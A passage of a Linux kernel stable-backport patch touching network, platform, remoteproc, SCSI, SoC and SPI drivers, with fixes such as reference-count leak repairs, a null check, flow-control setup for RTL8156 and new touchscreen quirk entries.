++++ b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+@@ -65,6 +65,8 @@ struct ionic *ionic_devlink_alloc(struct device *dev)
+ 	struct devlink *dl;
+ 
+ 	dl = devlink_alloc(&ionic_dl_ops, sizeof(struct ionic), dev);
++	if (!dl)
++		return NULL;
+ 
+ 	return devlink_priv(dl);
+ }
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+index 01c22701482d9..d7370fb60a168 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+@@ -691,7 +691,7 @@ static int ionic_get_rxnfc(struct net_device *netdev,
+ 		info->data = lif->nxqs;
+ 		break;
+ 	default:
+-		netdev_err(netdev, "Command parameter %d is not supported\n",
++		netdev_dbg(netdev, "Command parameter %d is not supported\n",
+ 			   info->cmd);
+ 		err = -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/sfc/mcdi_port_common.c b/drivers/net/ethernet/sfc/mcdi_port_common.c
+index 899cc16710048..0ab14f3d01d4d 100644
+--- a/drivers/net/ethernet/sfc/mcdi_port_common.c
++++ b/drivers/net/ethernet/sfc/mcdi_port_common.c
+@@ -972,12 +972,15 @@ static u32 efx_mcdi_phy_module_type(struct efx_nic *efx)
+ 
+ 	/* A QSFP+ NIC may actually have an SFP+ module attached.
+ 	 * The ID is page 0, byte 0.
++	 * QSFP28 is of type SFF_8636, however, this is treated
++	 * the same by ethtool, so we can also treat them the same.
+ 	 */
+ 	switch (efx_mcdi_phy_get_module_eeprom_byte(efx, 0, 0)) {
+-	case 0x3:
++	case 0x3: /* SFP */
+ 		return MC_CMD_MEDIA_SFP_PLUS;
+-	case 0xc:
+-	case 0xd:
++	case 0xc: /* QSFP */
++	case 0xd: /* QSFP+ */
++	case 0x11: /* QSFP28 */
+ 		return MC_CMD_MEDIA_QSFP_PLUS;
+ 	default:
+ 		return 0;
+@@ -1075,7 +1078,7 @@ int efx_mcdi_phy_get_module_info(struct efx_nic *efx, struct ethtool_modinfo *mo
+ 
+ 	case MC_CMD_MEDIA_QSFP_PLUS:
+ 		modinfo->type = ETH_MODULE_SFF_8436;
+-		modinfo->eeprom_len = ETH_MODULE_SFF_8436_LEN;
++		modinfo->eeprom_len = ETH_MODULE_SFF_8436_MAX_LEN;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 23da1d9dafd1f..059d610901d84 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -199,6 +199,7 @@
+ #define OCP_EEE_AR		0xa41a
+ #define OCP_EEE_DATA		0xa41c
+ #define OCP_PHY_STATUS		0xa420
++#define OCP_INTR_EN		0xa424
+ #define OCP_NCTL_CFG		0xa42c
+ #define OCP_POWER_CFG		0xa430
+ #define OCP_EEE_CFG		0xa432
+@@ -620,6 +621,9 @@ enum spd_duplex {
+ #define PHY_STAT_LAN_ON		3
+ #define PHY_STAT_PWRDN		5
+ 
++/* OCP_INTR_EN */
++#define INTR_SPEED_FORCE	BIT(3)
++
+ /* OCP_NCTL_CFG */
+ #define PGA_RETURN_EN		BIT(1)
+ 
+@@ -3023,12 +3027,16 @@ static int rtl_enable(struct r8152 *tp)
+ 	ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, ocp_data);
+ 
+ 	switch (tp->version) {
+-	case RTL_VER_08:
+-	case RTL_VER_09:
+-	case RTL_VER_14:
+-		r8153b_rx_agg_chg_indicate(tp);
++	case RTL_VER_01:
++	case RTL_VER_02:
++	case RTL_VER_03:
++	case RTL_VER_04:
++	case RTL_VER_05:
++	case RTL_VER_06:
++	case RTL_VER_07:
+ 		break;
+ 	default:
++		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	}
+ 
+@@ -3082,7 +3090,6 @@ static void r8153_set_rx_early_timeout(struct r8152 *tp)
+ 			       640 / 8);
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EXTRA_AGGR_TMR,
+ 			       ocp_data);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 
+ 	default:
+@@ -3116,7 +3123,6 @@ static void r8153_set_rx_early_size(struct r8152 *tp)
+ 	case RTL_VER_15:
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EARLY_SIZE,
+ 			       ocp_data / 8);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+@@ -5986,6 +5992,25 @@ static void rtl8153_disable(struct r8152 *tp)
+ 	r8153_aldps_en(tp, true);
+ }
+ 
++static u32 fc_pause_on_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
++}
++
++static u32 fc_pause_off_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
++}
++
++static void r8156_fc_parameter(struct r8152 *tp)
++{
++	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
++	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
++
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
++}
++
+ static int rtl8156_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -5994,6 +6019,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	if (test_bit(RTL8152_UNPLUG, &tp->flags))
+ 		return -ENODEV;
+ 
++	r8156_fc_parameter(tp);
+ 	set_tx_qlen(tp);
+ 	rtl_set_eee_plus(tp);
+ 	r8153_set_rx_early_timeout(tp);
+@@ -6025,9 +6051,24 @@ static int rtl8156_enable(struct r8152 *tp)
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_L1_CTRL, ocp_data);
+ 	}
+ 
++	ocp_data = ocp_read_word(tp, MCU_TYPE_USB, USB_FW_TASK);
++	ocp_data &= ~FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++	usleep_range(1000, 2000);
++	ocp_data |= FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++
+ 	return rtl_enable(tp);
+ }
+ 
++static void rtl8156_disable(struct r8152 *tp)
++{
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, 0);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, 0);
++
++	rtl8153_disable(tp);
++}
++
+ static int rtl8156b_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -6429,25 +6470,6 @@ static void rtl8153c_up(struct r8152 *tp)
+ 	r8153b_u1u2en(tp, true);
+ }
+ 
+-static inline u32 fc_pause_on_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
+-}
+-
+-static inline u32 fc_pause_off_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
+-}
+-
+-static void r8156_fc_parameter(struct r8152 *tp)
+-{
+-	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
+-	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
+-
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
+-}
+-
+ static void rtl8156_change_mtu(struct r8152 *tp)
+ {
+ 	u32 rx_max_size = mtu_to_size(tp->netdev->mtu);
+@@ -7538,6 +7560,11 @@ static void r8156_hw_phy_cfg(struct r8152 *tp)
+ 				      ((swap_a & 0x1f) << 8) |
+ 				      ((swap_a >> 8) & 0x1f));
+ 		}
++
++		/* Notify the MAC when the speed is changed to force mode. */
++		data = ocp_reg_read(tp, OCP_INTR_EN);
++		data |= INTR_SPEED_FORCE;
++		ocp_reg_write(tp, OCP_INTR_EN, data);
+ 		break;
+ 	default:
+ 		break;
+@@ -7933,6 +7960,11 @@ static void r8156b_hw_phy_cfg(struct r8152 *tp)
+ 		break;
+ 	}
+ 
++	/* Notify the MAC when the speed is changed to force mode. */
++	data = ocp_reg_read(tp, OCP_INTR_EN);
++	data |= INTR_SPEED_FORCE;
++	ocp_reg_write(tp, OCP_INTR_EN, data);
++
+ 	if (rtl_phy_patch_request(tp, true, true))
+ 		return;
+ 
+@@ -9377,7 +9409,7 @@ static int rtl_ops_init(struct r8152 *tp)
+ 	case RTL_VER_10:
+ 		ops->init		= r8156_init;
+ 		ops->enable		= rtl8156_enable;
+-		ops->disable		= rtl8153_disable;
++		ops->disable		= rtl8156_disable;
+ 		ops->up			= rtl8156_up;
+ 		ops->down		= rtl8156_down;
+ 		ops->unload		= rtl8153_unload;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 3f1883814ce21..9a612b13b4e46 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3405,12 +3405,14 @@ static void free_unused_bufs(struct virtnet_info *vi)
+ 		struct virtqueue *vq = vi->sq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_sq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		struct virtqueue *vq = vi->rq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_rq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 9afdc5ce86b43..609a2b86330d8 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -41,7 +41,7 @@ static int rtw8821c_read_efuse(struct rtw_dev *rtwdev, u8 *log_map)
+ 
+ 	map = (struct rtw8821c_efuse *)log_map;
+ 
+-	efuse->rfe_option = map->rfe_option;
++	efuse->rfe_option = map->rfe_option & 0x1f;
+ 	efuse->rf_board_option = map->rf_board_option;
+ 	efuse->crystal_cap = map->xtal_k;
+ 	efuse->pa_type_2g = map->pa_type;
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index cb24de9e97dc5..fa8f14c925ec3 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -44,14 +44,18 @@ static ssize_t store_min_max_freq_khz(struct uncore_data *data,
+ 				      int min_max)
+ {
+ 	unsigned int input;
++	int ret;
+ 
+ 	if (kstrtouint(buf, 10, &input))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&uncore_lock);
+-	uncore_write(data, input, min_max);
++	ret = uncore_write(data, input, min_max);
+ 	mutex_unlock(&uncore_lock);
+ 
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index d1ec31086e9ba..5b2c8dd2861b7 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10322,6 +10322,7 @@ static atomic_t dytc_ignore_event = ATOMIC_INIT(0);
+ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
++static int profile_force;
+ 
+ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		enum platform_profile_option *profile)
+@@ -10584,6 +10585,21 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 	if (err)
+ 		return err;
+ 
++	/* Check if user wants to override the profile selection */
++	if (profile_force) {
++		switch (profile_force) {
++		case -1:
++			dytc_capabilities = 0;
++			break;
++		case 1:
++			dytc_capabilities = BIT(DYTC_FC_MMC);
++			break;
++		case 2:
++			dytc_capabilities = BIT(DYTC_FC_PSC);
++			break;
++		}
++		pr_debug("Profile selection forced: 0x%x\n", dytc_capabilities);
++	}
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) { /* MMC MODE */
+ 		pr_debug("MMC is supported\n");
+ 		/*
+@@ -10597,11 +10613,6 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 				dytc_mmc_get_available = true;
+ 		}
+ 	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) { /* PSC MODE */
+-		/* Support for this only works on AMD platforms */
+-		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD) {
+-			dbg_printk(TPACPI_DBG_INIT, "PSC not support on Intel platforms\n");
+-			return -ENODEV;
+-		}
+ 		pr_debug("PSC is supported\n");
+ 	} else {
+ 		dbg_printk(TPACPI_DBG_INIT, "No DYTC support available\n");
+@@ -11650,6 +11661,9 @@ MODULE_PARM_DESC(uwb_state,
+ 		 "Initial state of the emulated UWB switch");
+ #endif
+ 
++module_param(profile_force, int, 0444);
++MODULE_PARM_DESC(profile_force, "Force profile mode. -1=off, 1=MMC, 2=PSC");
++
+ static void thinkpad_acpi_module_exit(void)
+ {
+ 	struct ibm_struct *ibm, *itmp;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 13802a3c3591d..68e66b60445c3 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -336,6 +336,22 @@ static const struct ts_dmi_data dexp_ursus_7w_data = {
+ 	.properties	= dexp_ursus_7w_props,
+ };
+ 
++static const struct property_entry dexp_ursus_kx210i_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
++	PROPERTY_ENTRY_U32("touchscreen-min-y",  2),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1720),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1137),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-dexp-ursus-kx210i.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data dexp_ursus_kx210i_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= dexp_ursus_kx210i_props,
++};
++
+ static const struct property_entry digma_citi_e200_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -378,6 +394,11 @@ static const struct ts_dmi_data gdix1001_01_upside_down_data = {
+ 	.properties	= gdix1001_upside_down_props,
+ };
+ 
++static const struct ts_dmi_data gdix1002_00_upside_down_data = {
++	.acpi_name	= "GDIX1002:00",
++	.properties	= gdix1001_upside_down_props,
++};
++
+ static const struct property_entry gp_electronic_t701_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 960),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 640),
+@@ -1185,6 +1206,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "7W"),
+ 		},
+ 	},
++	{
++		/* DEXP Ursus KX210i */
++		.driver_data = (void *)&dexp_ursus_kx210i_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "INSYDE Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "S107I"),
++		},
++	},
+ 	{
+ 		/* Digma Citi E200 */
+ 		.driver_data = (void *)&digma_citi_e200_data,
+@@ -1295,6 +1324,18 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "jumperx.T87.KFBNEEA"),
+ 		},
+ 	},
++	{
++		/* Juno Tablet */
++		.driver_data = (void *)&gdix1002_00_upside_down_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Default string"),
++			/* Both product- and board-name being "Default string" is somewhat rare */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_BOARD_NAME, "Default string"),
++			/* Above matches are too generic, add partial bios-version match */
++			DMI_MATCH(DMI_BIOS_VERSION, "JP2V1."),
++		},
++	},
+ 	{
+ 		/* Mediacom WinPad 7.0 W700 (same hw as Wintron surftab 7") */
+ 		.driver_data = (void *)&trekstor_surftab_wintron70_data,
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 95da1cbefacf0..506ec9565716b 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -627,15 +627,19 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da))
++		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da)) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		cpu_addr = devm_ioremap_wc(dev, rmem->base, rmem->size);
+ 		if (!cpu_addr) {
++			of_node_put(it.node);
+ 			dev_err(dev, "failed to map memory %p\n", &rmem->base);
+ 			return -ENOMEM;
+ 		}
+@@ -644,10 +648,12 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 		mem = rproc_mem_entry_init(dev, (void __force *)cpu_addr, (dma_addr_t)rmem->base,
+ 					   rmem->size, da, NULL, NULL, it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 596e1440cca56..8a2a7112678c2 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -460,6 +460,7 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(priv->dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -472,10 +473,12 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 					   imx_rproc_mem_alloc, imx_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/rcar_rproc.c b/drivers/remoteproc/rcar_rproc.c
+index aa86154109c77..1ff2a73ade907 100644
+--- a/drivers/remoteproc/rcar_rproc.c
++++ b/drivers/remoteproc/rcar_rproc.c
+@@ -62,13 +62,16 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(&rproc->dev,
+ 				"unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (rmem->base > U32_MAX)
++		if (rmem->base > U32_MAX) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		/* No need to translate pa to da, R-Car use same map */
+ 		da = rmem->base;
+@@ -79,8 +82,10 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 					   rcar_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/st_remoteproc.c b/drivers/remoteproc/st_remoteproc.c
+index a3268d95a50e6..e6bd3c7a950a2 100644
+--- a/drivers/remoteproc/st_remoteproc.c
++++ b/drivers/remoteproc/st_remoteproc.c
+@@ -129,6 +129,7 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -150,8 +151,10 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 7d782ed9e5896..23c1690b8d73f 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -223,11 +223,13 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (stm32_rproc_pa_to_da(rproc, rmem->base, &da) < 0) {
++			of_node_put(it.node);
+ 			dev_err(dev, "memory region not valid %pa\n",
+ 				&rmem->base);
+ 			return -EINVAL;
+@@ -254,8 +256,10 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index df2fe7bd26d1b..f530bb0364939 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -2450,6 +2450,9 @@ static void __qedi_remove(struct pci_dev *pdev, int mode)
+ 		qedi_ops->ll2->stop(qedi->cdev);
+ 	}
+ 
++	cancel_delayed_work_sync(&qedi->recovery_work);
++	cancel_delayed_work_sync(&qedi->board_disable_work);
++
+ 	qedi_free_iscsi_pf_param(qedi);
+ 
+ 	rval = qedi_ops->common->update_drv_state(qedi->cdev, false);
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 9c6cf2f5d77ce..d4cba3b3c56c4 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -101,10 +101,11 @@ struct llcc_slice_config {
+ 
+ struct qcom_llcc_config {
+ 	const struct llcc_slice_config *sct_data;
+-	int size;
+-	bool need_llcc_cfg;
+ 	const u32 *reg_offset;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
++	int size;
++	bool need_llcc_cfg;
++	bool no_edac;
+ };
+ 
+ enum llcc_reg_offset {
+@@ -401,6 +402,7 @@ static const struct qcom_llcc_config sdm845_cfg = {
+ 	.need_llcc_cfg	= false,
+ 	.reg_offset	= llcc_v1_reg_offset,
+ 	.edac_reg_offset = &llcc_v1_edac_reg_offset,
++	.no_edac	= true,
+ };
+ 
+ static const struct qcom_llcc_config sm6350_cfg = {
+@@ -850,7 +852,14 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 
+ 	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+-	if (drv_data->ecc_irq >= 0) {
++
++	/*
++	 * On some platforms, the access to EDAC registers will be locked by
++	 * the bootloader. So probing the EDAC driver will result in a crash.
++	 * Hence, disable the creation of EDAC platform device for the
++	 * problematic platforms.
++	 */
++	if (!cfg->no_edac) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+ 						sizeof(*drv_data));
+diff --git a/drivers/spi/spi-fsl-cpm.c b/drivers/spi/spi-fsl-cpm.c
+index ee905880769e6..7832ce330b29d 100644
+--- a/drivers/spi/spi-fsl-cpm.c
++++ b/drivers/spi/spi-fsl-cpm.c
+@@ -21,6 +21,7 @@
+ #include <linux/spi/spi.h>
+ #include <linux/types.h>
+ #include <linux/platform_device.h>
++#include <linux/byteorder/generic.h>
+ 
+ #include "spi-fsl-cpm.h"
+ #include "spi-fsl-lib.h"
+@@ -120,6 +121,21 @@ int fsl_spi_cpm_bufs(struct mpc8xxx_spi *mspi,
+ 		mspi->rx_dma = mspi->dma_dummy_rx;
+ 		mspi->map_rx_dma = 0;
+ 	}
++	if (t->bits_per_word == 16 && t->tx_buf) {
++		const u16 *src = t->tx_buf;
++		u16 *dst;
++		int i;
++
++		dst = kmalloc(t->len, GFP_KERNEL);
++		if (!dst)
++			return -ENOMEM;
++
++		for (i = 0; i < t->len >> 1; i++)
++			dst[i] = cpu_to_le16p(src + i);
++
++		mspi->tx = dst;
++		mspi->map_tx_dma = 1;
++	}
+ 
+ 	if (mspi->map_tx_dma) {
+ 		void *nonconst_tx = (void *)mspi->tx; /* shut up gcc */
+@@ -173,6 +189,13 @@ void fsl_spi_cpm_bufs_complete(struct mpc8xxx_spi *mspi)
+ 	if (mspi->map_rx_dma)
+ 		dma_unmap_single(dev, mspi->rx_dma, t->len, DMA_FROM_DEVICE);
+ 	mspi->xfer_in_progress = NULL;
++
++	if (t->bits_per_word == 16 && t->rx_buf) {
++		int i;
++
++		for (i = 0; i < t->len; i += 2)
++			le16_to_cpus(t->rx_buf + i);
++	}
+ }
+ EXPORT_SYMBOL_GPL(fsl_spi_cpm_bufs_complete);
+ 
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 5602f052b2b50..b14f430a699d0 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -177,26 +177,6 @@ static int mspi_apply_cpu_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	return bits_per_word;
+ }
+ 
+-static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+-				struct spi_device *spi,
+-				int bits_per_word)
+-{
+-	/* CPM/QE uses Little Endian for words > 8
+-	 * so transform 16 and 32 bits words into 8 bits
+-	 * Unfortnatly that doesn't work for LSB so
+-	 * reject these for now */
+-	/* Note: 32 bits word, LSB works iff
+-	 * tfcr/rfcr is set to CPMFCR_GBL */
+-	if (spi->mode & SPI_LSB_FIRST &&
+-	    bits_per_word > 8)
+-		return -EINVAL;
+-	if (bits_per_word <= 8)
+-		return bits_per_word;
+-	if (bits_per_word == 16 || bits_per_word == 32)
+-		return 8; /* pretend its 8 bits */
+-	return -EINVAL;
+-}
+-
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 					struct spi_transfer *t)
+ {
+@@ -224,9 +204,6 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else
+-		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+-							  bits_per_word);
+ 
+ 	if (bits_per_word < 0)
+ 		return bits_per_word;
+@@ -361,6 +338,22 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 32;
+ 			else if ((t->len & 1) == 0)
+ 				t->bits_per_word = 16;
++		} else {
++			/*
++			 * CPM/QE uses Little Endian for words > 8
++			 * so transform 16 and 32 bits words into 8 bits
++			 * Unfortnatly that doesn't work for LSB so
++			 * reject these for now
++			 * Note: 32 bits word, LSB works iff
++			 * tfcr/rfcr is set to CPMFCR_GBL
++			 */
++			if (m->spi->mode & SPI_LSB_FIRST && t->bits_per_word > 8)
++				return -EINVAL;
++			if (t->bits_per_word == 16 || t->bits_per_word == 32)
++				t->bits_per_word = 8; /* pretend its 8 bits */
++			if (t->bits_per_word == 8 && t->len >= 256 &&
++			    (mpc8xxx_spi->flags & SPI_CPM1))
++				t->bits_per_word = 16;
+ 		}
+ 	}
+ 	return fsl_spi_setup_transfer(m->spi, first);
+@@ -594,8 +587,14 @@ static struct spi_master *fsl_spi_probe(struct device *dev,
+ 	if (mpc8xxx_spi->type == TYPE_GRLIB)
+ 		fsl_spi_grlib_probe(dev);
+ 
+-	master->bits_per_word_mask =
+-		(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32)) &
++	if (mpc8xxx_spi->flags & SPI_CPM_MODE)
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 8) | SPI_BPW_MASK(16) | SPI_BPW_MASK(32));
++	else
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32));
++
++	master->bits_per_word_mask &=
